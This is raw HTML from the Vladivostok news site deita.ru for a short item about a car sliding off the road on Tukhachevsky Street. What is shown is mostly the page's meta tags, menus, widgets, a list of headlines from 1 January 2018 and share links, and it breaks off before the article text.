

<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js"> <!--<![endif]-->
    <head>
        <meta charset="utf-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <title>
            
                Неудачно завершает год владивостокский автолюбитель
            
            
                
                    - deita.ru
                
            
        </title>
        <meta name="description" content="На улице Тухачевского универсал ушел под откос, сообщает «Deita. ru». Фото дорожно-транспортного происшествия было опубликовано в популярном паблике dpskontrol_125rus. «Вот так чистят дороги у нас. Тухачевского», - пишет автор поста. «Или вот так ездят у нас?» - комментирует один из ..." />
        <meta name="viewport" content="width=device-width, initial-scale=1" />
        <meta name="google-site-verification" content="8rpsEqXEDnr6e3LLauQk8Xf8Z7jRjXsFY2CoZ0F2n3c" />
        <meta name="openstat-verification" content="db2f4c1f2a5729064de88dd0ac097993e7ff63d5" />
        <meta property="fb:app_id" content="817789788389473" />
        <meta property="og:title" content="Неудачно завершает год владивостокский автолюбитель" />
        <meta property="og:site_name" content="Deita"/>
        <meta property="og:url" content="http://deita.ru/news/neudachno-zavershaet-god-vladivostokskij-avtolyubitel/" />
        <meta property="og:locale" content="ru_RU" />
        <meta property="og:type" content="article" />
        <meta property="og:description" content="На улице Тухачевского универсал ушел под откос, сообщает «Deita. ru». Фото дорожно-транспортного происшествия было опубликовано в популярном паблике dpskontrol_125rus. «Вот так чистят дороги у нас. Тухачевского», - пишет автор поста. «Или вот так ездят у нас?» - комментирует один из ..." />
        
            
            <meta name="twitter:card" content="summary_large_image" />
            <meta name="twitter:site" content="@deitaru" />
            <meta property="og:image" content="http://deita.ru/media/images/______bUwqJa6.2e16d0ba.fill-1200x630-c100.jpg" />
            <meta property="og:image:width" content="1200" />
            <meta property="og:image:height" content="630" />
        

        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
        <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/foundicons/3.0.0/foundation-icons.min.css"/>
     <link rel="stylesheet" href="/static/CACHE/css/8ae0d726f4ab.css" type="text/css" />

    </head>

    <body class="" style="padding-top: 76px;">
        

        
            
<!-- Header -->
<!-- Medium-Up Navigation -->
<header role="banner">
<div class="top-bar">
  <div class="top-bar-left">
    <ul class="dropdown menu" data-dropdown-menu>
      <li class="menu-logo"> <a href="/" ><img src="/static/img/deita_logo.png" height="60" alt="Deita.ru" /></a></li>
    
        
            <li class="show-for-large "><a href="/category/%D0%BF%D1%80%D0%B8%D0%BC%D0%BE%D1%80%D1%81%D0%BA%D0%B8%D0%B9-%D0%BA%D1%80%D0%B0%D0%B9/">Приморье</a></li>
        
            <li class="show-for-large "><a href="/category/%D0%B7%D0%B4%D1%80%D0%B0%D0%B2%D0%BE%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B5%D0%BD%D0%B8%D0%B5/">Здравоохранение</a></li>
        
            <li class="show-for-large "><a href="/category/%D0%B2-%D0%BC%D0%B8%D1%80%D0%B5/">В Мире</a></li>
        
            <li class="show-for-large "><a href="/category/%D0%BE%D0%B1%D1%89%D0%B5%D1%81%D1%82%D0%B2%D0%BE/">Общество</a></li>
        
            <li class="show-for-large "><a href="/category/%D1%80%D0%B0%D0%B7%D0%B2%D0%BB%D0%B5%D1%87%D0%B5%D0%BD%D0%B8%D1%8F/">Развлечения</a></li>
        
            <li class="show-for-large show-for-xlarge"><a href="/category/%D0%B2-%D1%80%D0%BE%D1%81%D1%81%D0%B8%D0%B8/">В России</a></li>
        
            <li class="more-category" data-responsive-toggle="full-cat-menu" data-hide-for="x-large">
            <button class="dropdown button" type="button" data-toggle="full-cat-menu" ></button>
        </li>
        <li class="spec-category">
            <a href="/video/"> <i class="fi-video"></i><span class="show-for-xlarge">Видеоновости</span></a></li>
        <li class="spec-category">
                <a href="/votes/"><i class="fi-results-demographics"></i><span class="show-for-xlarge">Опросы</span></a></li>
    </ul>
  </div>
  <div class="top-bar-right">
          <ul class="tabs" data-active-collapse="true"  data-tabs id="header-tabs">
              <li class="tabs-title" ><a href="#panel_search"> <i class="header__button fi-magnifying-glass" ></i></a></li>
              <li class="tabs-title "><a href="#contacts"><i class="header__button fa fa-whatsapp"></i></a></li>
              
          </ul>
  </div>
</div>
    </div>
<div id="full-cat-menu">
    <ul class="menu top-bar dropdown vertical medium-horizontal" data-dropdown-menu>
    
        
            <li><a href="/category/%D0%BF%D1%80%D0%BE%D0%B8%D1%81%D1%88%D0%B5%D1%81%D1%82%D0%B2%D0%B8%D1%8F/">Происшествия</a></li>
        
            <li><a href="/category/%D1%8D%D0%BA%D0%BE%D0%BD%D0%BE%D0%BC%D0%B8%D0%BA%D0%B0/">Экономика</a></li>
        
            <li><a href="/category/%D0%BF%D0%BE%D0%BB%D0%B8%D1%82%D0%B8%D0%BA%D0%B0/">Политика</a></li>
        
            <li><a href="/category/%D0%BE%D0%B1%D1%89%D0%B5%D1%81%D1%82%D0%B2%D0%BE/">Общество</a></li>
        
            <li><a href="/category/%D1%81%D0%BF%D0%BE%D1%80%D1%82/">Спорт</a></li>
        
            <li><a href="/category/%D1%82%D1%83%D1%80%D0%B8%D0%B7%D0%BC/">Туризм</a></li>
        
            <li><a href="/category/%D0%BA%D1%83%D0%BB%D1%8C%D1%82%D1%83%D1%80%D0%B0/">Культура</a></li>
        
            <li><a href="/category/%D0%BD%D0%B0%D1%83%D0%BA%D0%B0/">Наука</a></li>
        
            <li><a href="/category/%D0%BF%D1%80%D0%B8%D1%80%D0%BE%D0%B4%D0%B0/">Природа</a></li>
        
            <li><a href="/category/%D0%B0%D0%B2%D1%82%D0%BE/">Авто</a></li>
        
            <li><a href="/category/%D1%83%D0%B4%D0%B8%D0%B2%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9-%D0%BC%D0%B8%D1%80/">Удивительный мир</a></li>
        
            <li><a href="/category/%D0%B6%D0%BA%D1%85/">ЖКХ</a></li>
        
            <li><a href="/category/%D0%BF%D0%B0%D1%80%D1%82%D0%BD%D0%B5%D1%80%D1%8B/">Партнеры</a></li>
        
            <li><a href="/category/%E8%B6%85%E7%BA%A7%E4%B8%93%E6%A0%8F/">超级专栏</a></li>
        
            <li><a href="/category/%D1%82%D0%B5%D1%85%D0%BD%D0%BE%D0%BB%D0%BE%D0%B3%D0%B8%D0%B8/">Технологии</a></li>
        
            <li><a href="/category/%D0%B0%D1%80%D0%BC%D0%B8%D1%8F/">Армия</a></li>
        
            <li><a href="/category/%D0%B7%D0%B4%D1%80%D0%B0%D0%B2%D0%BE%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B5%D0%BD%D0%B8%D0%B5/">Здравоохранение</a></li>
        
            <li><a href="/category/%D0%BE%D0%B1%D1%80%D0%B0%D0%B7%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5/">Образование</a></li>
        
            <li><a href="/category/%D0%BC%D0%B5%D0%B4%D0%B8%D0%B0%D0%BC%D0%B5%D1%82%D1%80%D0%B8%D0%BA%D1%81-%D0%B2%D0%BB%D0%B0%D0%B4%D0%B8%D0%B2%D0%BE%D1%81%D1%82%D0%BE%D0%BA/">Медиаметрикс. Владивосток</a></li>
        
            <li><a href="/category/%D0%B4%D0%B0%D0%BB%D1%8C%D0%BD%D0%B8%D0%B9-%D0%B2%D0%BE%D1%81%D1%82%D0%BE%D0%BA/">Дальний Восток</a></li>
        
            <li><a href="/category/%D0%BF%D1%80%D0%B8%D0%BC%D0%BE%D1%80%D1%81%D0%BA%D0%B8%D0%B9-%D0%BA%D1%80%D0%B0%D0%B9/">Приморье</a></li>
        
            <li><a href="/category/%D0%B2-%D1%80%D0%BE%D1%81%D1%81%D0%B8%D0%B8/">В России</a></li>
        
            <li><a href="/category/%D0%B2-%D0%BC%D0%B8%D1%80%D0%B5/">В Мире</a></li>
        
            <li><a href="/category/%D1%85%D0%B0%D0%B1%D0%B0%D1%80%D0%BE%D0%B2%D1%81%D0%BA%D0%B8%D0%B9-%D0%BA%D1%80%D0%B0%D0%B9/">Хабаровский край</a></li>
        
            <li><a href="/category/%D0%BA%D0%B0%D0%BC%D1%87%D0%B0%D1%82%D1%81%D0%BA%D0%B8%D0%B9-%D0%BA%D1%80%D0%B0%D0%B9/">Камчатка</a></li>
        
            <li><a href="/category/%D0%B0%D0%BC%D1%83%D1%80%D1%81%D0%BA%D0%B0%D1%8F-%D0%BE%D0%B1%D0%BB%D0%B0%D1%81%D1%82%D1%8C/">Амурская область</a></li>
        
            <li><a href="/category/%D0%BC%D0%B0%D0%B3%D0%B0%D0%B4%D0%B0%D0%BD%D1%81%D0%BA%D0%B0%D1%8F-%D0%BE%D0%B1%D0%BB%D0%B0%D1%81%D1%82%D1%8C/">Магаданская область</a></li>
        
            <li><a href="/category/%D1%81%D0%B0%D1%85%D0%B0%D0%BB%D0%B8%D0%BD%D1%81%D0%BA%D0%B0%D1%8F-%D0%BE%D0%B1%D0%BB%D0%B0%D1%81%D1%82%D1%8C/">Сахалин</a></li>
        
            <li><a href="/category/%D1%80%D0%B5%D1%81%D0%BF%D1%83%D0%B1%D0%BB%D0%B8%D0%BA%D0%B0-%D1%81%D0%B0%D1%85%D0%B0/">Республика Саха</a></li>
        
            <li><a href="/category/%D0%B5%D0%B2%D1%80%D0%B5%D0%B9%D1%81%D0%BA%D0%B0%D1%8F-%D0%B0%D0%B2%D1%82%D0%BE%D0%BD%D0%BE%D0%BC%D0%BD%D0%B0%D1%8F-%D0%BE%D0%B1%D0%BB%D0%B0%D1%81%D1%82%D1%8C/">ЕАО</a></li>
        
            <li><a href="/category/%D1%87%D1%83%D0%BA%D0%BE%D1%82%D1%81%D0%BA%D0%B8%D0%B9-%D0%B0%D0%B2%D1%82%D0%BE%D0%BD%D0%BE%D0%BC%D0%BD%D1%8B%D0%B9-%D0%BE%D0%BA%D1%80%D1%83%D0%B3/">Чукотка</a></li>
        
            <li><a href="/category/%D1%81%D1%82%D1%80%D0%B0%D0%BD%D1%8B-%D0%B0%D1%82%D1%80/">Страны АТР</a></li>
        
            <li><a href="/category/%D0%BD%D0%B0%D1%88%D0%B8-%D0%BF%D1%80%D0%BE%D0%B5%D0%BA%D1%82%D1%8B/">Наши проекты</a></li>
        
            <li><a href="/category/%D1%86%D0%B5%D0%BD%D1%8B-%D0%BF%D0%BE%D0%B4-%D0%BA%D0%BE%D0%BD%D1%82%D1%80%D0%BE%D0%BB%D1%8C/">Цены под контроль</a></li>
        
            <li><a href="/category/%D0%BF%D1%83%D1%82%D0%B5%D1%88%D0%B5%D1%81%D1%82%D0%B2%D0%B8%D1%8F/">Путешествия</a></li>
        
            <li><a href="/category/%D0%B8%D0%BD%D0%BE%D1%81%D1%82%D1%80%D0%B0%D0%BD%D1%86%D1%8B-%D0%B2-%D1%80%D0%BE%D1%81%D1%81%D0%B8%D0%B8/">Иностранцы в России</a></li>
        
            <li><a href="/category/%D0%BE%D0%BD%D0%BB%D0%B0%D0%B9%D0%BD-%D0%BA%D0%BE%D0%BD%D1%84%D0%B5%D1%80%D0%B5%D0%BD%D1%86%D0%B8%D0%B8/">Онлайн конференции</a></li>
        
            <li><a href="/category/%D0%B2%D0%B8%D0%B4%D0%B5%D0%BE%D1%80%D0%B5%D0%BF%D0%BE%D1%80%D1%82%D0%B0%D0%B6/">Видеорепортаж</a></li>
        
            <li><a href="/category/%D0%B8%D0%BD%D1%82%D0%B5%D1%80%D0%B2%D1%8C%D1%8E/">Интервью</a></li>
        
            <li><a href="/category/%D0%B4%D0%BD%D0%B5%D0%B2%D0%BD%D0%B8%D0%BA-%D0%B0%D0%B3%D0%B5%D0%BD%D1%82%D1%81%D1%82%D0%B2%D0%B0/">Дневник агентства</a></li>
        
            <li><a href="/category/%D1%84%D0%BE%D1%82%D0%BE%D0%B1%D0%B0%D1%80/">Фотобар</a></li>
        
            <li><a href="/category/%D0%B1%D0%BB%D0%BE%D0%B3%D0%B8/">Блоги</a></li>
        
            <li><a href="/category/%D1%81%D1%82%D0%B0%D1%82%D1%8C%D0%B8/">Статьи</a></li>
        
            <li><a href="/category/%D0%B0%D0%BD%D0%BE%D0%BD%D1%81%D1%8B/">Анонсы</a></li>
        
            <li><a href="/category/%D0%BE%D0%BF%D1%80%D0%BE%D1%81%D1%8B/">Опросы</a></li>
        
            <li><a href="/category/%D1%81%D0%BE%D1%86%D1%81%D0%B5%D1%82%D0%B8/">Соцсети</a></li>
        
            <li><a href="/category/%D0%B5%D0%B4%D0%B8%D0%BD%D0%B0%D1%8F-%D1%80%D0%BE%D1%81%D1%81%D0%B8%D1%8F/">Единая Россия</a></li>
        
            <li><a href="/category/%D0%B2%D0%BB%D0%B0%D1%81%D1%82%D1%8C/">Власть</a></li>
        
            <li><a href="/category/%D1%81%D1%82%D1%80%D0%BE%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D1%81%D1%82%D0%B2%D0%BE-%D0%B8-%D0%BD%D0%B5%D0%B4%D0%B2%D0%B8%D0%B6%D0%B8%D0%BC%D0%BE%D1%81%D1%82%D1%8C/">Строительство и недвижимость</a></li>
        
            <li><a href="/category/%D1%8D%D0%BD%D0%B5%D1%80%D0%B3%D0%B5%D1%82%D0%B8%D0%BA%D0%B0/">Энергетика</a></li>
        
            <li><a href="/category/%D0%BC%D0%B5%D1%80%D0%B8%D0%B4%D0%B8%D0%B0%D0%BD%D1%8B-%D1%82%D0%B8%D1%85%D0%BE%D0%B3%D0%BE/">«Меридианы Тихого»</a></li>
        
            <li><a href="/category/%D0%BA%D1%80%D0%B8%D0%BC%D0%B8%D0%BD%D0%B0%D0%BB/">Криминал</a></li>
        
            <li><a href="/category/%D0%B4%D0%B5%D1%82%D0%B8/">Дети</a></li>
        
            <li><a href="/category/%D1%80%D0%B0%D0%B7%D0%B2%D0%BB%D0%B5%D1%87%D0%B5%D0%BD%D0%B8%D1%8F/">Развлечения</a></li>
        
            <li><a href="/category/%D1%82%D1%80%D0%B0%D0%BD%D1%81%D0%BF%D0%BE%D1%80%D1%82/">Транспорт</a></li>
        
            <li><a href="/category/%D0%BF%D1%80%D0%B0%D0%B2%D0%BE%D1%81%D1%83%D0%B4%D0%B8%D0%B5/">Правосудие</a></li>
        
    </ul>
</div>



<div class="subnav-tab-conteiner" data-tabs-content="header-tabs">
    <div data-toggler data-animate="slide-in-down slide-out-up" class="tabs-panel" id="panel_search">
           <div class="row">
               <div class="large-10 medium-12 small-centered columns">
                   <form action="/search/" method="get">
                       <div class="input-group">
                           <input class="input-group-field" type="text" name="query">
                           <div class="input-group-button">
                               <input type="submit" class="button" value="Поиск">
                          </div>
                       </div>
                   </form>
               </div>
           </div>
    </div>

     <div data-toggler data-animate="slide-in-down slide-out-up" class="tabs-panel" id="exchange">
         <div class="row">
             <div class="large-10 medium-12 small-centered columns">
                 <table>
                     <thead >
                     <tr >
                         <th rowspan="2"></th>
                         <th class="text-center" colspan="2">US</th>
                         <th class="text-center" colspan="2">EUR</th>
                     </tr>
                     <tr>
                         <th>Покупка</th>
                         <th>Продажа</th>
                         <th>Покупка</th>
                         <th>Продажа</th>
                     </tr>
                     </thead>
                     <tbody>
                     <tr>
                         <td>Примтеркомбанк</td>
                     </tr>
                     <tr>
                         <td>АЛЬФА-БАНК</td>
                     </tr>

                     </tbody>
                 </table>
             </div>
         </div>

    </div>

    <div data-toggler data-animate="slide-in-down slide-out-up" class="tabs-panel" id="weather">

        <div class="weather">
                <div class="weather-today" >
                    <h4>Сегодня</h4>
                    <h4 class="js-temp"><span data-temptype="celsius" celsius="8">-20°/ -24°</span>C</h4>
                    <span class="weather-date">26  февраля</span>

                    <div class="weather-detail">
                        <div class="weather-image">
                            <img class="icon icons8-Cloud-Lighting" src="data:image/png;base64,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" width="62" height="62">
                        </div>
                        <div class="weather-temp">

                            <p><i class="wi wi-strong-wind"></i> 5 м/с</p>
                            <p><i class="wi wi-humidity"></i> 70%</p>
                        </div>
                    </div>


                </div>
            <div class="weather-daily">
                <ul class="daily">
                    <li>
                        <span class="weather-date">27  февраля</span>
                        <div class="weather-image">
                            <img class="icon icons8-Cloud-Lighting" src="data:image/png;base64,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" width="54" height="54">
                        </div>
                        <div class="weather-temperature-wind">
                            <span data-temptype="celsius" celsius="-20">-20°/ -25°</span>C
                        </div>
                    </li>
                    <li>
                        <span class="weather-date">28  февраля</span>
                        <div class="weather-image">
                            <img class="icon icons8-Cloud-Lighting" src="data:image/png;base64,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" width="54" height="54">
                        </div>
                        <div class="weather-temperature-wind">
                            <span data-temptype="celsius" celsius="8">8°/ 4°</span>C
                        </div>
                    </li>
                    <li>
                        <span class="weather-date">29  февраля</span>
                        <div class="weather-image">
                            <img class="icon icons8-Cloud-Lighting" src="data:image/png;base64,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" width="54" height="54">
                        </div>
                        <div class="weather-temperature-wind">
                            <span data-temptype="celsius" celsius="8">8°/ 4°</span>C
                        </div>
                    </li>
                    <li>
                        <span class="weather-date">30  февраля</span>
                        <div class="weather-image">
                            <img class="icon icons8-Cloud-Lighting" src="data:image/png;base64,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" width="54" height="54">
                        </div>
                        <div class="weather-temperature-wind">
                            <span data-temptype="celsius" celsius="8">8°/ 4°</span>C
                        </div>
                    </li>
                </ul>
            </div>
        </div>
    </div>

    <div data-toggler data-animate="slide-in-down slide-out-up" class="tabs-panel" id="contacts" style="background-color: white">
        <div class="row" >
            <div class="column" style="color: #183566; font-size: 20px;">Присылайте новости на наш WhatsApp: +7 924 245-36-70</div>
        </div>
    </div>

</div>

</header>

        

        <main>
<div id="vidget-metrica__outer" class="hide">
<div class="vidget-metrica is-stuck autostick ">
    <span class="vidget-metrica__expand" data-expand-contract-video=""></span>
    <span class="close-button" data-close-video=""></span>
    <div class="responsive-embed widescreen">
       <div id='radio-metrica' data-radio-width='250'  data-radio-height='150'></div>
    </div>
</div>
    <div class="video-overlay is-stuck" data-close-video=""></div>
    </div>
        
 <div class="ads-wrapper">
    


<div class="ads-container" >
<ul class='ads-group m-ads_main_banner_top m-ads_1200x120'>
		<li class='b-ads m-ads_image m-ads_52' style="width: 1200px; height: 120px;">
			
				<a href='http://deita.ru/news/primorcy-nazvali-znachimye-sobytiya-2017-goda/' class='b-banner__link'>
                
                    
                
                
                 
                 
                 
                 
                 
                 
						<img src='/media/images/________________dZSCoHZ.2e16d0ba.fill-1200x120.jpg' width='1200' height='120'
                             alt='Баннер новый год' title='' class='b-banner__img'>
				</a>

			

		</li><!-- b-banner -->

</ul><!-- b-banner-group -->
</div>


 </div>





<div id="article-feed">
<div class="article-page  regular-page "  data-title="Неудачно завершает год владивостокский автолюбитель" data-href="/news/neudachno-zavershaet-god-vladivostokskij-avtolyubitel/" data-hitcount="366306">



    <div class="article-left columns">
         <div class="ads-wrapper show-for-medium">
        
         </div>
        
<div class="column-card">
    <div class="read-more">
        <h4><svg height="13" width="13"><polygon points="13,0 0,0 0,13" style="fill:#e31e24;" /></svg> Последнее</h4>
    </div>
    
    
        <div class="news-list"><a href="/news/kuda-bezhat-esli-pribolel-v-prazdniki-v-primore/">Куда бежать, если приболел в праздники в Приморье</a>
            <time class="published-time">1 Январь 2018, 11:40</time>
        </div>
    
        <div class="news-list"><a href="/news/30-sposobov-pokazat-svoyu-lyubov-kotorye-nichego-ne-stoyat/">30 способов показать свою любовь, которые ничего не стоят</a>
            <time class="published-time">1 Январь 2018, 11:24</time>
        </div>
    
        <div class="news-list"><a href="/news/fotoreportazh-kak-vo-vladivostoke-novyj-god-vstrechali/">Фоторепортаж: как во Владивостоке провожали 2017 год</a>
            <time class="published-time">1 Январь 2018, 10:52</time>
        </div>
    
        <div class="news-list"><a href="/news/mrot-uvelichili-v-rossii/">МРОТ увеличили в России</a>
            <time class="published-time">1 Январь 2018, 10:24</time>
        </div>
    
        <div class="news-list"><a href="/news/v-primore-pod-novyj-god-proizoshlo-11-pozharov/">В Приморье под Новый год произошло 11 пожаров</a>
            <time class="published-time">1 Январь 2018, 09:50</time>
        </div>
    
        <div class="news-list"><a href="/news/problemu-primorskoj-pensionerki-reshila-sobaka/">Проблему приморской пенсионерки решила собака</a>
            <time class="published-time">1 Январь 2018, 09:41</time>
        </div>
    
        <div class="news-list"><a href="/news/otvazhnaya-belka-otobrala-pechenki-u-amerikanskogo-policejskogo/">Отважная белка отобрала печеньки у американского полицейского</a>
            <time class="published-time">1 Январь 2018, 09:15</time>
        </div>
    
        <div class="news-list"><a href="/news/putin-sokrashaet-10-tysyach-policejskih/">Путин сокращает 10 тысяч полицейских</a>
            <time class="published-time">1 Январь 2018, 08:15</time>
        </div>
    
        <div class="news-list"><a href="/news/advokat-predatelya-mok-presmykaetsya-pered-rossiej/">Адвокат предателя: «МОК пресмыкается перед Россией»</a>
            <time class="published-time">1 Январь 2018, 07:15</time>
        </div>
    
        <div class="news-list"><a href="/news/nazvany-chetyre-scenariya-vojny-s-kndr/">Названы четыре сценария войны с КНДР</a>
            <time class="published-time">1 Январь 2018, 06:15</time>
        </div>
    
</div>
        <div class="column-card">
            <h4 style="border-bottom: 1px solid #a5a5a5; margin-bottom: 4px;"><svg height="13" width="13"><polygon points="13,0 0,0 0,13" style="fill:#e31e24;" /></svg> Новости партнеров</h4>
            <script src='//mediametrics.ru/partner/inject/inject.js' type='text/javascript' id='MediaMetricsInject' data-width='190' data-height='310' data-img='true' data-imgsize='70' data-type='img' data-bgcolor='FFFFFF' data-bordercolor='000000' data-linkscolor='232323' data-transparent='' data-rows='4' data-inline='' data-font='small' data-fontfamily='roboto' data-border='' data-borderwidth='0' data-alignment='vertical' data-country='ru' data-site='mmet/deita_ru'> </script>
        </div>
    </div>
    <div class="article-container medium-6 columns">
    <div class="row">
        
            
<div class="small-1 large-1 columns share-links-container" data-sticky-container>
<ul class="share-links sticky" data-page-id="420653" data-sticky data-options="stickTo:top; marginTop: 6; checkEvery:50;" data-anchor="article-420653">
    <li class="facebook">
        <div><a name="facebook-share-link" class="share-links__a" title="Facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fdeita.ru%2Fnews%2Fneudachno-zavershaet-god-vladivostokskij-avtolyubitel%2F" target="_blank" >
            <i class="fi-social-facebook"></i></a></div>
    </li>
    <li class="twitter">
        <div><a class="share-links__a" href="https://twitter.com/share?text=%D0%9D%D0%B5%D1%83%D0%B4%D0%B0%D1%87%D0%BD%D0%BE%20%D0%B7%D0%B0%D0%B2%D0%B5%D1%80%D1%88%D0%B0%D0%B5%D1%82%20%D0%B3%D0%BE%D0%B4%20%D0%B2%D0%BB%D0%B0%D0%B4%D0%B8%D0%B2%D0%BE%D1%81%D1%82%D0%BE%D0%BA%D1%81%D0%BA%D0%B8%D0%B9%20%D0%B0%D0%B2%D1%82%D0%BE%D0%BB%D1%8E%D0%B1%D0%B8%D1%82%D0%B5%D0%BB%D1%8C&url=http%3A%2F%2Fdeita.ru%2Fnews%2Fneudachno-zavershaet-god-vladivostokskij-avtolyubitel%2F"><i class="fi-social-twitter"></i></a></div>
    </li>
    <li class="vk">
        <div><a target="_blank" class="share-links__a" title="VK.com" href="http://vk.com/share.php?url=http%3A%2F%2Fdeita.ru%2Fnews%2Fneudachno-zavershaet-god-vladivostokskij-avtolyubitel%2F&title=%D0%9D%D0%B5%D1%83%D0%B4%D0%B0%D1%87%D0%BD%D0%BE%20%D0%B7%D0%B0%D0%B2%D0%B5%D1%80%D1%88%D0%B0%D0%B5%D1%82%20%D0%B3%D0%BE%D0%B4%20%D0%B2%D0%BB%D0%B0%D0%B4%D0%B8%D0%B2%D0%BE%D1%81%D1%82%D0%BE%D0%BA%D1%81%D0%BA%D0%B8%D0%B9%20%D0%B0%D0%B2%D1%82%D0%BE%D0%BB%D1%8E%D0%B1%D0%B8%D1%82%D0%B5%D0%BB%D1%8C&description=&image=/media/images/______bUwqJa6.2e16d0ba.fill-1200x630-c100.jpg">
            <svg version="1.1" id="vkico" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"  viewBox="0 0 548.358 548.358"  xml:space="preserve">
                <g>	<path d="M545.451,400.298c-0.664-1.431-1.283-2.618-1.858-3.569c-9.514-17.135-27.695-38.167-54.532-63.102l-0.567-0.571 l-0.284-0.28l-0.287-0.287h-0.288c-12.18-11.611-19.893-19.418-23.123-23.415c-5.91-7.614-7.234-15.321-4.004-23.13 2.282-5.9,10.854-18.36,25.696-37.397c7.807-10.089,13.99-18.175,18.556-24.267c32.931-43.78,47.208-71.756,42.828-83.939	l-1.701-2.847c-1.143-1.714-4.093-3.282-8.846-4.712c-4.764-1.427-10.853-1.663-18.278-0.712l-82.224,0.568	c-1.332-0.472-3.234-0.428-5.712,0.144c-2.475,0.572-3.713,0.859-3.713,0.859l-1.431,0.715l-1.136,0.859 c-0.952,0.568-1.999,1.567-3.142,2.995c-1.137,1.423-2.088,3.093-2.848,4.996c-8.952,23.031-19.13,44.444-30.553,64.238 c-7.043,11.803-13.511,22.032-19.418,30.693c-5.899,8.658-10.848,15.037-14.842,19.126c-4,4.093-7.61,7.372-10.852,9.849 c-3.237,2.478-5.708,3.525-7.419,3.142c-1.715-0.383-3.33-0.763-4.859-1.143c-2.663-1.714-4.805-4.045-6.42-6.995 c-1.622-2.95-2.714-6.663-3.285-11.136c-0.568-4.476-0.904-8.326-1-11.563c-0.089-3.233-0.048-7.806,0.145-13.706 c0.198-5.903,0.287-9.897,0.287-11.991c0-7.234,0.141-15.085,0.424-23.555c0.288-8.47,0.521-15.181,0.716-20.125 c0.194-4.949,0.284-10.185,0.284-15.705s-0.336-9.849-1-12.991c-0.656-3.138-1.663-6.184-2.99-9.137	c-1.335-2.95-3.289-5.232-5.853-6.852c-2.569-1.618-5.763-2.902-9.564-3.856c-10.089-2.283-22.936-3.518-38.547-3.71 c-35.401-0.38-58.148,1.906-68.236,6.855c-3.997,2.091-7.614,4.948-10.848,8.562c-3.427,4.189-3.905,6.475-1.431,6.851
                        c11.422,1.711,19.508,5.804,24.267,12.275l1.715,3.429c1.334,2.474,2.666,6.854,3.999,13.134c1.331,6.28,2.19,13.227,2.568,20.837
                        c0.95,13.897,0.95,25.793,0,35.689c-0.953,9.9-1.853,17.607-2.712,23.127c-0.859,5.52-2.143,9.993-3.855,13.418
                        c-1.715,3.426-2.856,5.52-3.428,6.28c-0.571,0.76-1.047,1.239-1.425,1.427c-2.474,0.948-5.047,1.431-7.71,1.431
                        c-2.667,0-5.901-1.334-9.707-4c-3.805-2.666-7.754-6.328-11.847-10.992c-4.093-4.665-8.709-11.184-13.85-19.558
                        c-5.137-8.374-10.467-18.271-15.987-29.691l-4.567-8.282c-2.855-5.328-6.755-13.086-11.704-23.267
                        c-4.952-10.185-9.329-20.037-13.134-29.554c-1.521-3.997-3.806-7.04-6.851-9.134l-1.429-0.859c-0.95-0.76-2.475-1.567-4.567-2.427
                        c-2.095-0.859-4.281-1.475-6.567-1.854l-78.229,0.568c-7.994,0-13.418,1.811-16.274,5.428l-1.143,1.711
                        C0.288,140.146,0,141.668,0,143.763c0,2.094,0.571,4.664,1.714,7.707c11.42,26.84,23.839,52.725,37.257,77.659
                        c13.418,24.934,25.078,45.019,34.973,60.237c9.897,15.229,19.985,29.602,30.264,43.112c10.279,13.515,17.083,22.176,20.412,25.981
                        c3.333,3.812,5.951,6.662,7.854,8.565l7.139,6.851c4.568,4.569,11.276,10.041,20.127,16.416
                        c8.853,6.379,18.654,12.659,29.408,18.85c10.756,6.181,23.269,11.225,37.546,15.126c14.275,3.905,28.169,5.472,41.684,4.716h32.834
                        c6.659-0.575,11.704-2.669,15.133-6.283l1.136-1.431c0.764-1.136,1.479-2.901,2.139-5.276c0.668-2.379,1-5,1-7.851
                        c-0.195-8.183,0.428-15.558,1.852-22.124c1.423-6.564,3.045-11.513,4.859-14.846c1.813-3.33,3.859-6.14,6.136-8.418
                        c2.282-2.283,3.908-3.666,4.862-4.142c0.948-0.479,1.705-0.804,2.276-0.999c4.568-1.522,9.944-0.048,16.136,4.429
                        c6.187,4.473,11.99,9.996,17.418,16.56c5.425,6.57,11.943,13.941,19.555,22.124c7.617,8.186,14.277,14.271,19.985,18.274
                        l5.708,3.426c3.812,2.286,8.761,4.38,14.853,6.283c6.081,1.902,11.409,2.378,15.984,1.427l73.087-1.14
                        c7.229,0,12.854-1.197,16.844-3.572c3.998-2.379,6.373-5,7.139-7.851c0.764-2.854,0.805-6.092,0.145-9.712
                        C546.782,404.25,546.115,401.725,545.451,400.298z"/></g>
            </svg>
        </a></div>
    </li>

    <li class="odnoclassniki">
        <div><a target="_blank" class="share-links__a" title="Одноклассники" href="http://www.odnoklassniki.ru/dk?st.cmd=addShare&st.s=1&st._surl=http%3A%2F%2Fdeita.ru%2Fnews%2Fneudachno-zavershaet-god-vladivostokskij-avtolyubitel%2F&st.comments=%D0%9D%D0%B5%D1%83%D0%B4%D0%B0%D1%87%D0%BD%D0%BE%20%D0%B7%D0%B0%D0%B2%D0%B5%D1%80%D1%88%D0%B0%D0%B5%D1%82%20%D0%B3%D0%BE%D0%B4%20%D0%B2%D0%BB%D0%B0%D0%B4%D0%B8%D0%B2%D0%BE%D1%81%D1%82%D0%BE%D0%BA%D1%81%D0%BA%D0%B8%D0%B9%20%D0%B0%D0%B2%D1%82%D0%BE%D0%BB%D1%8E%D0%B1%D0%B8%D1%82%D0%B5%D0%BB%D1%8C">
